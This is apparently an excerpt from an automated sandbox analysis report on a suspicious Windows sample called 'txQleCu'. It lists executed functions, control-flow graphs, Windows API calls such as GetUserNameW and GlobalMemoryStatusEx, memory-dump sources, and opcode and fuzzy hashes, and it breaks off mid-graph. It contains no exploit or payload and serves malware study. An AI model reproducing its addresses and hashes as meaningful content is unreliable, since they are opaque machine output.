31872->31873 31875 5801979 31872->31875 31874 58019ca CallWindowProcW 31873->31874 31873->31875 31874->31875 31875->31869 31877 5801972 31876->31877 31879 5801979 31876->31879 31878 58019ca CallWindowProcW 31877->31878 31877->31879 31878->31879 31879->31869 31667 196f198 31668 196f200 CreateWindowExW 31667->31668 31670 196f2bc 31668->31670 31671 196b298 DuplicateHandle 31672 196b32e 31671->31672 31880 1963e48 31881 1963e56 31880->31881 31884 19639ec 31881->31884 31883 1963e5f 31885 19639f7 31884->31885 31888 1963a0c 31885->31888 31887 1963edd 31887->31883 31889 1963a17 31888->31889 31890 19635e0 3 API calls 31889->31890 31891 1963f95 31890->31891 31891->31887 31892 196ac68 GetCurrentProcess 31893 196ace2 GetCurrentThread 31892->31893 31894 196acdb 31892->31894 31895 196ad1f GetCurrentProcess 31893->31895 31896 196ad18 31893->31896 31894->31893 31899 196ad55 31895->31899 31896->31895 31897 196ad7d GetCurrentThreadId 31898 196adae 31897->31898 31899->31897

                                            Executed Functions

                                            Function 0196AC58 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 914 196ac58-196acd9 GetCurrentProcess 917 196ace2-196ad16 GetCurrentThread 914->917 918 196acdb-196ace1 914->918 919 196ad1f-196ad53 GetCurrentProcess 917->919 920 196ad18-196ad1e 917->920 918->917 922 196ad55-196ad5b 919->922 923 196ad5c-196ad74 919->923 920->919 922->923 934 196ad77 call 196b610 923->934 935 196ad77 call 196b221 923->935 926 196ad7d-196adac GetCurrentThreadId 927 196adb5-196ae17 926->927 928 196adae-196adb4 926->928 928->927 934->926 935->926
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0196ACC8
                                            • GetCurrentThread.KERNEL32 ref: 0196AD05
                                            • GetCurrentProcess.KERNEL32 ref: 0196AD42
                                            • GetCurrentThreadId.KERNEL32 ref: 0196AD9B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 24fb557ac2257e6c324224dac3ebbd3c8da26167783dd906ecfb34a097ce77e9
                                            • Instruction ID: f585808bef850b1b0465744961f69542c27bcd8c3540902009a8b88f61a2bd8a
                                            • Opcode Fuzzy Hash: 24fb557ac2257e6c324224dac3ebbd3c8da26167783dd906ecfb34a097ce77e9
                                            • Instruction Fuzzy Hash: B75155B49003498FDB14CFAAC9887DEBBF9BF48314F248459E409B7261C7755984CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0196AC68 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 936 196ac68-196acd9 GetCurrentProcess 937 196ace2-196ad16 GetCurrentThread 936->937 938 196acdb-196ace1 936->938 939 196ad1f-196ad53 GetCurrentProcess 937->939 940 196ad18-196ad1e 937->940 938->937 942 196ad55-196ad5b 939->942 943 196ad5c-196ad74 939->943 940->939 942->943 954 196ad77 call 196b610 943->954 955 196ad77 call 196b221 943->955 946 196ad7d-196adac GetCurrentThreadId 947 196adb5-196ae17 946->947 948 196adae-196adb4 946->948 948->947 954->946 955->946
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0196ACC8
                                            • GetCurrentThread.KERNEL32 ref: 0196AD05
                                            • GetCurrentProcess.KERNEL32 ref: 0196AD42
                                            • GetCurrentThreadId.KERNEL32 ref: 0196AD9B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: ce5a38aac38ee2932cf18b8203b99ca30eb874f0af8152b176af95f2269000f6
                                            • Instruction ID: b2a3a7fe3daee01ebfbf9a65ba6de157162c080fff6288a921ba5f6814f3df75
                                            • Opcode Fuzzy Hash: ce5a38aac38ee2932cf18b8203b99ca30eb874f0af8152b176af95f2269000f6
                                            • Instruction Fuzzy Hash: 865153B49003098FDB14CFAAC988BDEBBF9BF48314F248459E009B7260C7796884CF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01968988 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1082 1968988-196899d call 1967cf0 1085 19689b3-19689b7 1082->1085 1086 196899f 1082->1086 1087 19689cb-1968a0c 1085->1087 1088 19689b9-19689c3 1085->1088 1137 19689a5 call 1968c03 1086->1137 1138 19689a5 call 1968c10 1086->1138 1093 1968a0e-1968a16 1087->1093 1094 1968a19-1968a27 1087->1094 1088->1087 1089 19689ab-19689ad 1089->1085 1092 1968ae8-1968ba8 1089->1092 1130 1968bb0-1968bdb GetModuleHandleW 1092->1130 1131 1968baa-1968bad 1092->1131 1093->1094 1096 1968a4b-1968a4d 1094->1096 1097 1968a29-1968a2e 1094->1097 1100 1968a50-1968a57 1096->1100 1098 1968a30-1968a37 call 1967cfc 1097->1098 1099 1968a39 1097->1099 1105 1968a3b-1968a49 1098->1105 1099->1105 1101 1968a64-1968a6b 1100->1101 1102 1968a59-1968a61 1100->1102 1106 1968a6d-1968a75 1101->1106 1107 1968a78-1968a81 call 1967d0c 1101->1107 1102->1101 1105->1100 1106->1107 1112 1968a83-1968a8b 1107->1112 1113 1968a8e-1968a93 1107->1113 1112->1113 1115 1968a95-1968a9c 1113->1115 1116 1968ab1-1968ab5 1113->1116 1115->1116 1117 1968a9e-1968aae call 1967d1c call 1967d2c 1115->1117 1135 1968ab8 call 1969308 1116->1135 1136 1968ab8 call 19692f8 1116->1136 1117->1116 1119 1968abb-1968abe 1121 1968ac0-1968ade 1119->1121 1122 1968ae1-1968ae7 1119->1122 1121->1122 1132 1968be4-1968bf8 1130->1132 1133 1968bdd-1968be3 1130->1133 1131->1130 1133->1132 1135->1119 1136->1119 1137->1089 1138->1089
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 01968BCE
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: e05ceced29ba132318d5a4e172e34508ec42c5a5e269070f3dc5960dcd30e715
                                            • Instruction ID: 559a501e242b6a44f73365f247b4dd0dad35bfba2997b89f8645e0ad2b1c4e6a
                                            • Opcode Fuzzy Hash: e05ceced29ba132318d5a4e172e34508ec42c5a5e269070f3dc5960dcd30e715
                                            • Instruction Fuzzy Hash: D4714570A00B058FD764CF6AD45476ABBF9BF88304F108A2ED48AD7B50DB75E805CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 019691CE Relevance: 1.6, APIs: 1, Instructions: 124libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1139 19691ce-19691d6 1140 19691c1-19691c7 1139->1140 1141 19691d8-19691e8 1139->1141 1150 196b840-196b866 1140->1150 1142 1969172 1141->1142 1143 19691ea-1969230 1141->1143 1144 1969174-1969183 1142->1144 1145 196915f 1142->1145 1151 1969232-1969235 1143->1151 1152 1969238-1969267 LoadLibraryExW 1143->1152 1148 1969139-1969197 1144->1148 1145->1148 1156 196b86d-196b87b 1150->1156 1157 196b868 1150->1157 1151->1152 1153 1969270-196928d 1152->1153 1154 1969269-196926f 1152->1154 1153->1150 1154->1153 1161 196b87d 1156->1161 1162 196b898-196b8b9 1156->1162 1157->1156 1164 196b887-196b88b call 196aee4 1161->1164 1165 196b8c3 1162->1165 1166 196b8bb 1162->1166 1168 196b890 1164->1168 1169 196b8c4 1165->1169 1166->1165 1168->1162 1169->1169
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01968C49,00000800,00000000,00000000), ref: 0196925A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 8fa41cc2617cf708bd1e5e14bb5eaf3b8471f247272f81e987f18b692741b6bd
                                            • Instruction ID: cf11fb6eddeff68c60611e0c84882af68d01673fe8ecefe407b8aab8db1af35e
                                            • Opcode Fuzzy Hash: 8fa41cc2617cf708bd1e5e14bb5eaf3b8471f247272f81e987f18b692741b6bd
                                            • Instruction Fuzzy Hash: 0041BD75D002588FDB24CFA9C844BEEBBFABF88310F14845ED41AAB340D7799945CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0196F18C Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1170 196f18c-196f1fe 1173 196f200-196f206 1170->1173 1174 196f209-196f210 1170->1174 1173->1174 1175 196f212-196f218 1174->1175 1176 196f21b-196f253 1174->1176 1175->1176 1177 196f25b-196f2ba CreateWindowExW 1176->1177 1178 196f2c3-196f2fb 1177->1178 1179 196f2bc-196f2c2 1177->1179 1183 196f2fd-196f300 1178->1183 1184 196f308 1178->1184 1179->1178 1183->1184 1185 196f309 1184->1185 1185->1185
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0196F2AA
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: d8bd1882dca0abf54ea3f881ea1b7a0f35002a864988211512915dadc8ccded9
                                            • Instruction ID: da5c371a640657885445119e4f966776fae78cd74dc09d2fc0449ace7f840b16
                                            • Opcode Fuzzy Hash: d8bd1882dca0abf54ea3f881ea1b7a0f35002a864988211512915dadc8ccded9
                                            • Instruction Fuzzy Hash: A851C1B5D003099FDB14CFAAD894ADEFFB5BF48314F24852AE819AB210D7759845CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0196F198 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1186 196f198-196f1fe 1187 196f200-196f206 1186->1187 1188 196f209-196f210 1186->1188 1187->1188 1189 196f212-196f218 1188->1189 1190 196f21b-196f2ba CreateWindowExW 1188->1190 1189->1190 1192 196f2c3-196f2fb 1190->1192 1193 196f2bc-196f2c2 1190->1193 1197 196f2fd-196f300 1192->1197 1198 196f308 1192->1198 1193->1192 1197->1198 1199 196f309 1198->1199 1199->1199
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0196F2AA
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: fb4081cdf37c56a96efa3f1c4f6728306988d1e6337625064fd5b6138fcf7bcd
                                            • Instruction ID: cd69cd677c220acf5e5ceb179f54f58da8ad3ec333bff0f7fe12837585625854
                                            • Opcode Fuzzy Hash: fb4081cdf37c56a96efa3f1c4f6728306988d1e6337625064fd5b6138fcf7bcd
                                            • Instruction Fuzzy Hash: 7241CEB5D003099FDB14CF9AD894ADEFBB9BF48310F24852AE819AB210D7759885CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05801930 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1200 5801930-580196c 1201 5801972-5801977 1200->1201 1202 5801a1c-5801a3c 1200->1202 1203 5801979-58019b0 1201->1203 1204 58019ca-5801a02 CallWindowProcW 1201->1204 1208 5801a3f-5801a4c 1202->1208 1211 58019b2-58019b8 1203->1211 1212 58019b9-58019c8 1203->1212 1205 5801a04-5801a0a 1204->1205 1206 5801a0b-5801a1a 1204->1206 1205->1206 1206->1208 1211->1212 1212->1208
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 058019F1
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.443202268.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_5800000_txQleCu.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: ed671788e2600be680674dea21502b2e4c6e82170c9153ebb45259af2d360f9a
                                            • Instruction ID: 77755b850f014867d36bef151629c6303147afaf64a70bbe3f9618331c2e8a92
                                            • Opcode Fuzzy Hash: ed671788e2600be680674dea21502b2e4c6e82170c9153ebb45259af2d360f9a
                                            • Instruction Fuzzy Hash: 95414CB8A00305CFDB54CF99C888AAABBF5FB88324F24C459D519A7351D774A841CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0196B290 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1214 196b290-196b296 1215 196b298-196b32c DuplicateHandle 1214->1215 1216 196b335-196b352 1215->1216 1217 196b32e-196b334 1215->1217 1217->1216
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0196B31F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: a1afb780d603334aa22d81dcd6065ecf088fc79a9a6515393ac04baf0667741d
                                            • Instruction ID: 5679d660f50bde09c6feb70f983e745e0854174ddcd160749b0c32466b8420bb
                                            • Opcode Fuzzy Hash: a1afb780d603334aa22d81dcd6065ecf088fc79a9a6515393ac04baf0667741d
                                            • Instruction Fuzzy Hash: 4B212AB59002099FDB10CFAAD484AEEFFF9EB08320F14841AE814E7310D3759954CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0196B298 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1220 196b298-196b32c DuplicateHandle 1221 196b335-196b352 1220->1221 1222 196b32e-196b334 1220->1222 1222->1221
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0196B31F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 9c1448d99323dce339e186df93b024738070388f16abd2dad2ea74b893da0b37
                                            • Instruction ID: 739a1844e91dcd9aa55aaa32d9317201a43054d0b88de2b0f39fd407bba20075
                                            • Opcode Fuzzy Hash: 9c1448d99323dce339e186df93b024738070388f16abd2dad2ea74b893da0b37
                                            • Instruction Fuzzy Hash: 2D21F5B59002099FDB10CF9AD984ADEFFF9FB48324F14841AE915A3310D379A944CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01967D58 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1225 1967d58-1969230 1227 1969232-1969235 1225->1227 1228 1969238-1969267 LoadLibraryExW 1225->1228 1227->1228 1229 1969270-196b866 1228->1229 1230 1969269-196926f 1228->1230 1234 196b86d-196b87b 1229->1234 1235 196b868 1229->1235 1230->1229 1237 196b87d-196b88b call 196aee4 1234->1237 1238 196b898-196b8b9 1234->1238 1235->1234 1244 196b890 1237->1244 1241 196b8c3 1238->1241 1242 196b8bb 1238->1242 1245 196b8c4 1241->1245 1242->1241 1244->1238 1245->1245
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01968C49,00000800,00000000,00000000), ref: 0196925A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 50131602432982d2d221c92fed6aa88de3394ff732785870939e436be2262009
                                            • Instruction ID: ebe340988d765f7e1f0c0528dbd4200273d1ac313fa58d418ef3eacda499ef3e
                                            • Opcode Fuzzy Hash: 50131602432982d2d221c92fed6aa88de3394ff732785870939e436be2262009
                                            • Instruction Fuzzy Hash: CF1117B69002099FDB14CF9AC484ADEFBF9EB48324F14841EE519B7200C375A945CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0AAB9568 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1252 aab9568-aab95cd FindCloseChangeNotification 1253 aab95cf-aab95d5 1252->1253 1254 aab95d6-aab95fe 1252->1254 1253->1254
                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 0AAB95C0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.446684336.000000000AAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AAB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_aab0000_txQleCu.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: f3a86f31595a5a14c53453d383efeb32df7b5f058b01a84a2d12882f5389fe4b
                                            • Instruction ID: 53e87da145003c190918fa2f67c2c447856c8ab83c57dcb056128237dc6a4f48
                                            • Opcode Fuzzy Hash: f3a86f31595a5a14c53453d383efeb32df7b5f058b01a84a2d12882f5389fe4b
                                            • Instruction Fuzzy Hash: 611148B58002098FCB10CF9AC484BDEBBF8EF48324F10841AD559A7741D779A949CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01968B68 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1246 1968b68-1968ba8 1247 1968bb0-1968bdb GetModuleHandleW 1246->1247 1248 1968baa-1968bad 1246->1248 1249 1968be4-1968bf8 1247->1249 1250 1968bdd-1968be3 1247->1250 1248->1247 1250->1249
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 01968BCE
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 5baef1def5a71f3522082533ea65f1fd8b49fe5038d118aea2479c0b9fe07bb3
                                            • Instruction ID: acb9d8b2af1fc08c624dced1db454b288488f43c6a1b6eb4b97836e58abf3d7b
                                            • Opcode Fuzzy Hash: 5baef1def5a71f3522082533ea65f1fd8b49fe5038d118aea2479c0b9fe07bb3
                                            • Instruction Fuzzy Hash: AE11E3B5C007498FDB20CF9AC944BDEFBF8AB48324F14845AD459A7600C779A546CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0AAB7CA0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0AAB7D05
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.446684336.000000000AAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AAB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_aab0000_txQleCu.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: db1acd32fd6dbe817237f4fc22414370ec10f28d2c86bd4ea86d92fdbd5434f9
                                            • Instruction ID: 830f18541da5ecbae0902c6dfd7f00bee8d09b3b62e7da394a65a86a0705ffe7
                                            • Opcode Fuzzy Hash: db1acd32fd6dbe817237f4fc22414370ec10f28d2c86bd4ea86d92fdbd5434f9
                                            • Instruction Fuzzy Hash: 2D11F5B58002499FDB10CF9AD884BEEBBF8EB58324F20881AE455A7601C375A945CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0196F3D8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowLongW.USER32(?,?,?), ref: 0196F43D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: LongWindow
                                            • String ID:
                                            • API String ID: 1378638983-0
                                            • Opcode ID: 0d20b03b66298601fa5aa563420465d19b5a6038f8d62f0bc33bd2de53e68c67
                                            • Instruction ID: 0438f0491c91c2263711eadb4f00eff8d2342b259bc2f4f923f3edab3ec5dadf
                                            • Opcode Fuzzy Hash: 0d20b03b66298601fa5aa563420465d19b5a6038f8d62f0bc33bd2de53e68c67
                                            • Instruction Fuzzy Hash: C111F8B58002098FDB10CF9AD985BDEBBF8EB48328F14841AD555A7641C375A945CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0AAB7CA8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0AAB7D05
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.446684336.000000000AAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AAB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_aab0000_txQleCu.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 2545510bb36c5698bf9d2ddd22fd2e1d97ded9249f6d9caa036ebb1db109900f
                                            • Instruction ID: 4c7bf9e4e822157331d2c1d02200021349b9b611287d724f3b1eefcc6ecd4806
                                            • Opcode Fuzzy Hash: 2545510bb36c5698bf9d2ddd22fd2e1d97ded9249f6d9caa036ebb1db109900f
                                            • Instruction Fuzzy Hash: 1D11E8B58003499FDB10CF9AD984BDEFBF8EB48324F10841AE455A7641C375A944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0196F3E0 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowLongW.USER32(?,?,?), ref: 0196F43D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.434261909.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_1960000_txQleCu.jbxd
                                            Similarity
                                            • API ID: LongWindow
                                            • String ID:
                                            • API String ID: 1378638983-0
                                            • Opcode ID: 0a570640956b79fa33497ef948dc3d16cf4bd88e7dce55a98b761b37a4310a3f
                                            • Instruction ID: 21de574bff226d87fa3d2ca08fb8392073835b94ecf424843dbc1f453e8d90bd
                                            • Opcode Fuzzy Hash: 0a570640956b79fa33497ef948dc3d16cf4bd88e7dce55a98b761b37a4310a3f
                                            • Instruction Fuzzy Hash: F61115B58002089FDB10CF9AD984BDEFBF8EB48324F20841AE919A7700C375A945CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:9.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:3.1%
                                            Total number of Nodes:98
                                            Total number of Limit Nodes:15
                                            execution_graph 28360 2e35a50 28361 2e35a6e 28360->28361 28364 2e359c0 28361->28364 28363 2e35aa5 28366 2e37570 LoadLibraryA 28364->28366 28367 2e37669 28366->28367 28368 2e3f650 28370 2e3f6b1 GetUserNameW 28368->28370 28371 2e3f79d 28370->28371 28372 62cdb38 DuplicateHandle 28373 62cdbce 28372->28373 28260 2e30448 28261 2e3044d 28260->28261 28262 2e3048f 28261->28262 28265 2e30bb0 28261->28265 28272 2e30f88 28261->28272 28268 2e30bd0 28265->28268 28266 2e30e6f 28266->28261 28268->28266 28269 2e30f88 GlobalMemoryStatusEx 28268->28269 28283 2e310b8 28268->28283 28304 2e30f98 28268->28304 28309 2e3fe98 28268->28309 28269->28268 28274 2e30f8b 28272->28274 28277 2e30e96 28272->28277 28273 2e30f84 28273->28261 28275 2e310ae 28274->28275 28276 2e30bb0 GlobalMemoryStatusEx 28274->28276 28281 2e310b8 GlobalMemoryStatusEx 28274->28281 28275->28261 28276->28274 28277->28273 28278 2e30f88 GlobalMemoryStatusEx 28277->28278 28279 2e30f98 GlobalMemoryStatusEx 28277->28279 28280 2e310b8 GlobalMemoryStatusEx 28277->28280 28282 2e3fe98 GlobalMemoryStatusEx 28277->28282 28278->28277 28279->28277 28280->28277 28281->28274 28282->28277 28285 2e310bf 28283->28285 28287 2e30f9f 28283->28287 28284 2e310ae 28284->28268 28288 2e310fc 28285->28288 28316 2e316c8 28285->28316 28322 2e316d8 28285->28322 28286 2e30bb0 GlobalMemoryStatusEx 28286->28287 28287->28284 28287->28286 28297 2e310b8 GlobalMemoryStatusEx 28287->28297 28289 2e31104 28288->28289 28328 2e3dba8 28288->28328 28334 2e3dbb8 28288->28334 28290 2e3110c 28289->28290 28340 2e3dd20 28289->28340 28346 2e3dd11 28289->28346 28291 2e30bb0 GlobalMemoryStatusEx 28290->28291 28292 2e3112c 28291->28292 28293 2e31158 28292->28293 28294 2e30bb0 GlobalMemoryStatusEx 28292->28294 28293->28268 28295 2e3114c 28294->28295 28296 2e30bb0 GlobalMemoryStatusEx 28295->28296 28296->28293 28297->28287 28307 2e30f9f 28304->28307 28305 2e310ae 28305->28268 28306 2e30bb0 GlobalMemoryStatusEx 28306->28307 28307->28305 28307->28306 28308 2e310b8 GlobalMemoryStatusEx 28307->28308 28308->28307 28310 2e3fea2 28309->28310 28311 2e30bb0 GlobalMemoryStatusEx 28310->28311 28315 2e3fec2 28310->28315 28312 2e3feb2 28311->28312 28352 62c7983 28312->28352 28356 62c7988 28312->28356 28315->28268 28317 2e316ee 28316->28317 28318 2e30bb0 GlobalMemoryStatusEx 28317->28318 28321 2e31712 28318->28321 28319 2e30bb0 GlobalMemoryStatusEx 28319->28321 28320 2e317a4 28320->28320 28321->28319 28321->28320 28323 2e316ee 28322->28323 28324 2e30bb0 GlobalMemoryStatusEx 28323->28324 28327 2e31712 28324->28327 28325 2e30bb0 GlobalMemoryStatusEx 28325->28327 28326 2e317a4 28326->28326 28327->28325 28327->28326 28329 2e3dbce 28328->28329 28330 2e30bb0 GlobalMemoryStatusEx 28329->28330 28333 2e3dbfb 28330->28333 28331 2e3dc7c 28331->28331 28332 2e30bb0 GlobalMemoryStatusEx 28332->28333 28333->28331 28333->28332 28335 2e3dbce 28334->28335 28336 2e30bb0 GlobalMemoryStatusEx 28335->28336 28339 2e3dbfb 28336->28339 28337 2e3dc7c 28337->28337 28338 2e30bb0 GlobalMemoryStatusEx 28338->28339 28339->28337 28339->28338 28341 2e3dd36 28340->28341 28342 2e30bb0 GlobalMemoryStatusEx 28341->28342 28343 2e3dd5a 28342->28343 28344 2e3de3e 28343->28344 28345 2e30bb0 GlobalMemoryStatusEx 28343->28345 28344->28344 28345->28343 28347 2e3dd20 28346->28347 28348 2e30bb0 GlobalMemoryStatusEx 28347->28348 28349 2e3dd5a 28348->28349 28350 2e3de3e 28349->28350 28351 2e30bb0 